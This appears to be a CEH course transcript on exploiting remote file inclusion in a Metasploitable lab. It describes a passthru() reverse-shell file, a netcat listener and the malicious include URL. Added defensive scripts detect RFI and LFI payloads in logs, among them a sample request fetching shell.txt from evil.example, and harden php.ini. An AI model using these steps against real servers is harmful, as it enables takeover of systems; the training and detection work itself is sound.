EC Council CEH 312-50 V11 – Website Hacking – File Upload, Code Execution & File Inclusion Vulns part 2
- Remote File Inclusion Vulnerabilities – Configuring PHP Settings
Remote file inclusion is a special case of file inclusion vulnerabilities. We’ve seen in the previous video how we were able to include any file on the server and get access to it through local file inclusion vulnerabilities. In today’s video, if the server is configured to allow certain settings called allow_url_fopen and allow_url_include, then we will be able to include any file from any computer into the target website. So we’ll literally be able to inject any PHP file into the target computer. What this leads to is that we can run payloads, we can run reverse shells, and we can even run system commands and get access to the target, or full control of the target server. So first of all, let’s just go here; we’ll be using the same file inclusion vulnerability that we were using in the previous video.
So it’s in the page parameter right here. The only difference is you need to enable the setting that converts the local file inclusion into a remote file inclusion. So, as the names say, local allows you to access local files, and remote will allow you to access and inject remote files. To enable that, I’m going to go to my Metasploitable machine; I’m just going to show you how to enable it so you can test this vulnerability yourself. So we’re coming here to our Metasploitable and I’m going to go into the PHP settings. The PHP settings are stored in a file, and to access that we’re going to use nano, which is a text editor.
And then I’m going to put in the file location, which is /etc/php5/cgi/php.ini. So that’s the location where the PHP configuration is stored. I’m going to open it using a file editor called nano, and I’m just going to exit this; I’m going to open it with sudo, as root. Actually, in Kali we never needed to use sudo because we log in as root, but with Metasploitable you need to use sudo when you want to do root actions. So you say sudo and then you put the command that you want to run. Okay, so these are the configurations for the PHP that’s installed on the web server on the target, and we’re looking for a setting called allow_url_fopen.
So I’m going to press Ctrl+W, which allows me to search, and I’m going to search for allow_url, and we can see here that allow_url_fopen is On and allow_url_include is On as well. If these two settings are enabled, then the local file inclusion vulnerability that we have can be used as a remote file inclusion. To exit, press Ctrl+X, and it’s going to ask you if you want to save; just type Y and Enter. For me, I didn’t change anything, so I didn’t need to do that. Once you do that, you need to restart your web server, so you’re going to run /etc/init.d/apache2 restart, and you’ll need to do this with sudo, actually. And this is done now, so everything should be ready for you.
- Remote File Inclusion Vulnerabilities – Discovery & Exploitation
Just like we did before. In the last video, we put ../ five times and then /etc/passwd to access the password file. What we’re going to do today is try to access a file located on a different server. So if you’re doing this pen test on an actual web server, then the file that you want to include needs to be stored in a place with a real IP address or a domain name. I’m doing this on my local network, so I’m going to store this on the web server on the Kali machine, on 10.20.14.203. This (the target) is 10.20.14.204, and I’m going to store my file on 10.20.14.203. That file, as I said, can be anything. It could be a web shell, it could be a payload.
What I’m going to do is create a very simple PHP file. So this is just the PHP start and end of the file. And in the file I’m going to use a function called passthru(). What this function does is execute operating system commands, so depending on the web server it’s going to execute Windows or Linux commands. You put the command here between the two quotation marks, and I’m going to use the same command we used with the code execution vulnerability, which was the netcat command that allowed us to get a reverse connection from our target.
So I’m going to paste that here. Let’s first have a look at this. The <?php and ?> are just the start and the end of the PHP file. passthru() is the function that I’m going to use, which executes any command that’s inserted between the quotations, and I’m using the same command that we used in the command execution vulnerability, which will just make a reverse connection to my computer. So this is all good. Now the next step is the most important step, and it’s storing this file. As I said, if your target was a remote web server, then you should be storing this file in a place with a real IP where it can be reached from the remote web server.
Now I’m going to be trying to access this from my Metasploitable machine, which is able to access files stored on the Kali machine because they’re both on the same network. And I’m going to be storing it in /var/www/html, so it’s being stored on the Kali, not on the Metasploitable, and I’m going to call it reverse and save it as .txt, not .php. I’m doing this because if I store it as a .php, it’s going to be executed on the Kali machine, so it’s going to create a reverse connection from the Kali machine, and I don’t want that. I don’t want to hack the Kali machine; I actually already have access to the Kali machine. The one that I want to hack is the Metasploitable machine, and that one is remote.
So in order to be able to include the PHP code and execute it on the remote machine, we’re going to store it as .txt and get it executed on the Metasploitable machine instead of executing it on my Kali. So I’m saving it as .txt. And now let’s just see here: if I go to my localhost and request reverse.txt, we’ll see our file right here. Again, this is on my localhost, which is not the Metasploitable machine; it’s 10.20.14.203, and the Metasploitable is on .204. So how are we going to run this? First, let me just listen for connections like we did before, so it’s just going to be nc -vvlp 8080. And then right here, instead of including a file on the same server, I’m going to include a remote file, and the value is going to be an http:// URL.
So it’s just going to be the link to this file, so we can access the file here as .txt. I’m going to copy it and paste it here. And also, in some cases you might need to add a question mark to the end to get this file to be executed as PHP. So I’m just going to go over this one more time: we are including a remote file, which is on a remote server. Make sure the remote server is accessible by your target, and also make sure you store it as .txt, because if you keep it as .php, the reverse file will be executed on the remote server, so it will be executed on the .203 instead of being executed on the .204.
I’m keeping it as .txt; this way it’s going to be executed on the .204 and it’s going to give me a remote connection to this computer, to the Metasploitable computer. So if I come back here, as you can see, we have a remote connection. If we do a uname -a, you’ll see that this is the Metasploitable machine, not the Kali machine. So we basically have full access to the Metasploitable machine through a remote file inclusion vulnerability. Now we can do an ls, we can do a pwd to see where we are, and we can literally run any Linux command we want on the machine and do anything we want. Basically we have full access to that machine.
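The requests made in this section leave an obvious trail in the web server's access log, so a detection check belongs next to the exploitation walkthrough. The script below is an added example written for this page, not code from the course video, and it runs over constructed Apache combined-format log lines (the `/index.php` path, the timestamps and the request sizes are made up; the addresses mirror the lab above). It flags a `page` parameter that either points at a remote URL (a remote file inclusion attempt) or walks out of the document root with `../` or an absolute path (a local file inclusion attempt), decoding the value a second time so URL-encoded payloads are caught too.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-format log lines (not real traffic). The third and
# fifth lines are RFI attempts, the second and fourth are LFI attempts.
SAMPLE_LOG = """\
10.20.14.203 - - [12/Mar/2021:10:01:02 +0000] "GET /index.php?page=include.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.20.14.203 - - [12/Mar/2021:10:01:09 +0000] "GET /index.php?page=../../../../../etc/passwd HTTP/1.1" 200 2110 "-" "Mozilla/5.0"
10.20.14.203 - - [12/Mar/2021:10:01:15 +0000] "GET /index.php?page=http://10.20.14.203/reverse.txt? HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.20.14.203 - - [12/Mar/2021:10:01:20 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 2110 "-" "Mozilla/5.0"
10.20.14.203 - - [12/Mar/2021:10:01:25 +0000] "GET /index.php?page=https%3A%2F%2Fevil.example%2Fshell.txt%3F HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)

# Schemes PHP's URL wrappers will fetch when allow_url_include is on.
REMOTE_SCHEME = re.compile(r'^(?:https?|ftp)://', re.I)


def classify_page_param(value):
    """Return 'rfi', 'lfi' or None for one value of the include parameter."""
    # parse_qs already decoded once; decode again to catch double-encoded payloads.
    v = unquote(value)
    if REMOTE_SCHEME.match(v):
        return "rfi"
    if "../" in v or "..\\" in v or v.startswith("/"):
        return "lfi"
    return None


def scan_log(text, param="page"):
    """Yield (client_ip, kind, raw_value) for every suspicious include parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            kind = classify_page_param(value)
            if kind:
                findings.append((m.group("ip"), kind, value))
    return findings


if __name__ == "__main__":
    for ip, kind, value in scan_log(SAMPLE_LOG):
        print(f"{ip} {kind.upper()} page={value}")
```

Run it against a real `access.log` by replacing `SAMPLE_LOG` with the file contents; the parameter name is the one the vulnerable script reads, which on this page is `page`. A status of 200 on the RFI lines is not proof of success (the included file may simply have failed to execute), so treat hits as leads to correlate with the outbound connection from the web server, not as confirmed compromise.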
- Preventing The Above Vulnerabilities
Let’s talk about how we can prevent these vulnerabilities. The first thing is that a lot of these vulnerabilities exist because of the functionality they provide. For example, the file upload problem we had: it allows the user to upload any file extension, any file type. This shouldn’t happen. There shouldn’t be a way for users to upload any files they want. If you want them to upload a picture, then make sure they’re uploading a picture. Check the file types. If you’re expecting them to upload a song, an MP3 file, make sure it’s a media file, not PHP or executable code. Usually you should never allow users to upload any executables. Filters can be used to check the extension and make sure that the file being uploaded is a JPEG or whatever.
But that’s not a good way. The best way is to check the file type and make sure the file type is a picture or a media file, instead of checking the extension, because that can be bypassed as well. The second type of vulnerability that we looked at was code execution vulnerabilities. In these exploits we were able to run any code we wanted on the target computer. Again, this functionality should be avoided. You should avoid allowing users to run any sort of code on your server. Try to avoid all these functions such as eval(), passthru() and all the functions that allow a user to run operating system commands on the server. If you absolutely have to use something like that, then make sure you analyze the input before you execute it.
For example, in the example we’ve seen, the code was doing a ping, and it would ping anything we put in the text box. So I’m putting “text box” here just to show that this is the input that we put in the text box. This is what the program actually looks like. If it looks complicated, forget about it; we’re just talking about the concept here. So, for example, what we did is we put a normal IP, then a semicolon, and then a command that we wanted to run, for example ls -la. The problem with this is the web application used to take this the way it is, copy it and run it in here, which means when you execute this command it’ll do the ping first and then it will do the ls -la, which is the command that we wanted.
What you need to do, if you had to do it... what I advise is that you just don’t use these functions. If you have to use a function like this, then what you should do is check that the input is what you’re expecting. For example, you’re expecting an IP address and nothing else, so you can use a regex to make sure. Now I’m not going to talk about regex or what regex is. Regex is basically a rule that will make sure that the input has the following format: it takes a digit, digit, digit, digit, digit, digit, digit, digit, and if I put anything else, then the web application should refuse it. You can also make sure that there are no semicolons and that there are no spaces, so everything comes in as one thing and then it gets executed.
This is a way of making it more secure, but the best thing is just to avoid these functions. The third type of vulnerability that we looked at was file inclusion. We looked at two types: local file inclusion, which allowed us to include any file on the system and then read files, which causes a file disclosure vulnerability where you’d be able to read any file on the server; and then remote file inclusion, which is very dangerous, and which allowed us to include any file from any web server. So we were able to include PHP shells and then get a connection from the target computer. To prevent these, first of all, make sure you prevent remote file inclusion, so just in case anything goes wrong, people can’t include files from outside your server.
And you can do that the same way we enabled it, using php.ini, by disabling allow_url_fopen and allow_url_include. If we go here to our Metasploitable, I’ll just show you very quickly. So if we do sudo nano /etc/php5/cgi/php.ini, the same file that we used, this is the file for the PHP settings. If you open that file, press Ctrl+W and look for allow_url. You want to make sure that allow_url_fopen is set to Off, and allow_url_include is set to Off as well. Ctrl+X, Y and Enter, and that will save it for you. The other way to prevent these exploits is to use static file inclusion. So instead of using dynamic file inclusion, which we’ve seen, you can hard-code the files that you want to include in the code and not get them using GET or POST.
For example, what’s happening in the vulnerable examples we’ve seen is we have a page called index.php, and this index.php takes a parameter called page, which names another page, for example news.php, and it includes this news.php in the code. So what does the code look like? In the PHP code you’ll see something like include, and that looks like this, I believe: what it does is include whatever comes after the page parameter. So the code dynamically takes whatever comes in after the page parameter and includes it in the current page; this would be in the index.php page. Okay, this is very bad. Because even if it’s not GET, sometimes people use POST.
And with POST, you won’t see this in the URL, as it will be posted. But you can use a proxy such as Burp Proxy, and it would look like that, and then you can modify it and get it to include anything you want, and then it’s displayed on the page. What we really want is for the user not to be able to manipulate what’s going to be included. So if you wanted to include a page called news.php, just include it directly without giving the user the ability to change it. I know you’re going to program your code to have it look like this, but we’ve seen how users can play with this and get it to include anything they want. So the best way to do it is just to have it include the page (news.php) directly, so your code is not using any variables; it’s hard-coded. It might make your code longer, but it’s much more secure.
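The two php.ini settings are edited by hand twice on this page, once to enable them in the first section and once to turn them off here. The script below is an added example for this page, not part of the course video, that does the same audit and fix mechanically so it can be run across many hosts or in a build check; the php.ini excerpt it contains is constructed, with the real comment wording shortened. Two caveats a practitioner should keep in mind: allow_url_include is the setting that lets include() and require() fetch a URL, and it only works when allow_url_fopen is also on, while allow_url_fopen by itself governs fopen()/file_get_contents() and some applications rely on it to fetch remote resources, so turning it off can break them; and allow_url_include is deprecated as of PHP 7.4. A missing directive falls back to PHP's built-in default, which the audit accounts for.

```python
import re

# Directives that turn a local file inclusion into a remote one.
DANGEROUS = ("allow_url_fopen", "allow_url_include")
# Spellings PHP's ini parser treats as "on".
ON_VALUES = {"1", "on", "true", "yes"}
# Matches an active (uncommented) directive line; value stops at whitespace or ';'.
SETTING_RE = re.compile(r"^\s*(allow_url_fopen|allow_url_include)\s*=\s*([^\s;]*)", re.I)

# Constructed excerpt of a php.ini in the state shown on the Metasploitable host.
SAMPLE_INI = """\
[PHP]
; Whether to allow the treatment of URLs as files.
allow_url_fopen = On
; Whether to allow include/require to open URLs as files.
allow_url_include = On
display_errors = Off
"""


def audit_php_ini(text):
    """Return {directive: is_enabled} for both remote-include directives."""
    found = {}
    for line in text.splitlines():
        m = SETTING_RE.match(line)
        if m:
            found[m.group(1).lower()] = m.group(2).strip('"').lower() in ON_VALUES
    # Absent directives take PHP's compiled-in defaults: fopen On, include Off.
    found.setdefault("allow_url_fopen", True)
    found.setdefault("allow_url_include", False)
    return found


def harden_php_ini(text):
    """Return a copy of the ini text with both directives set to Off.

    Existing lines are rewritten in place; a directive that was absent is
    appended so the hardened state no longer depends on PHP's default.
    """
    out, seen = [], set()
    for line in text.splitlines():
        m = SETTING_RE.match(line)
        if m:
            name = m.group(1).lower()
            seen.add(name)
            out.append(f"{name} = Off")
        else:
            out.append(line)
    for name in DANGEROUS:
        if name not in seen:
            out.append(f"{name} = Off")
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    text = open(path).read() if path else SAMPLE_INI
    for name, enabled in audit_php_ini(text).items():
        print(f"{name}: {'ENABLED' if enabled else 'off'}")
```

Point it at the file the page uses (`python3 audit.py /etc/php5/cgi/php.ini`) to see the state before editing; write `harden_php_ini()` output back only with root privileges and restart Apache afterwards, exactly as the walkthrough does, because the CGI/FPM process reads php.ini once at start-up.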
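The three fixes described in this section (check the content of an upload rather than its extension, validate command input and avoid passing it through a shell, and never let a request parameter choose the included file) are shown together below in one added example written for this page; it is not code from the course and the page map, file names and addresses in it are made up. It generalises the advice slightly where that is the usual practice: the include fix uses a fixed allow-list that maps a short key to a hard-coded file name, which is equivalent to the hard-coded include the instructor recommends but keeps one entry point; the upload check also requires the extension to agree with the detected content, and the ping check refuses the input rather than trying to strip semicolons out of it. One caveat on uploads: a magic-byte check is necessary but not sufficient, because a file can begin with valid JPEG bytes and still carry PHP code, so uploads must also be stored under a server-chosen name, outside the web root or somewhere the server will never execute them.

```python
import ipaddress
import re
import subprocess
from pathlib import Path

# ---- 1. File upload: decide by content, then require the extension to agree ----
# Leading bytes of the image formats we accept (constructed allow-list).
MAGIC = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}
ALLOWED_EXT = {
    "image/jpeg": {".jpg", ".jpeg"},
    "image/png": {".png"},
    "image/gif": {".gif"},
}


def detect_image_type(data):
    """Return the MIME type whose signature the data starts with, else None."""
    for mime, signatures in MAGIC.items():
        if any(data.startswith(sig) for sig in signatures):
            return mime
    return None


def upload_allowed(filename, data):
    """True only if the bytes are an accepted image and the extension matches."""
    mime = detect_image_type(data)
    if mime is None:
        return False
    return Path(filename).suffix.lower() in ALLOWED_EXT[mime]


# ---- 2. Command execution: accept only an IPv4 address, never use a shell ----
def is_valid_ipv4(value):
    """Strict dotted-quad check: shape by regex, octet range by ipaddress."""
    if re.fullmatch(r"(?:\d{1,3}\.){3}\d{1,3}", value) is None:
        return False  # rejects ';', spaces, hostnames and anything else
    try:
        ipaddress.IPv4Address(value)  # rejects octets above 255
    except ValueError:
        return False
    return True


def build_ping_command(target):
    """Return the argv list for ping; raises if the target is not a plain IPv4."""
    if not is_valid_ipv4(target):
        raise ValueError("target must be a dotted IPv4 address")
    # An argument list with no shell: a ';' could never start a second command.
    return ["ping", "-c", "3", target]


def run_ping(target):
    """Run ping without a shell (not exercised by the tests; needs a network)."""
    return subprocess.run(build_ping_command(target), capture_output=True, text=True, check=False)


# ---- 3. File inclusion: a request parameter selects a key, never a path ----
# Constructed page map; the file names on the right are hard-coded, as the
# section recommends, so no user-supplied string ever reaches include().
PAGES = {"news": "news.php", "about": "about.php"}
DEFAULT_PAGE = "home.php"


def resolve_page(page_param):
    """Map the page parameter to a hard-coded file; unknown keys fall back."""
    return PAGES.get(page_param, DEFAULT_PAGE)
```

The same three rules carry over to the PHP side unchanged: `finfo_file()` for the content check, `escapeshellarg()` only as a last resort after the IP validation rather than instead of it, and an `include` whose argument is a literal from an array like `PAGES` rather than `$_GET['page']` or `$_POST['page']`.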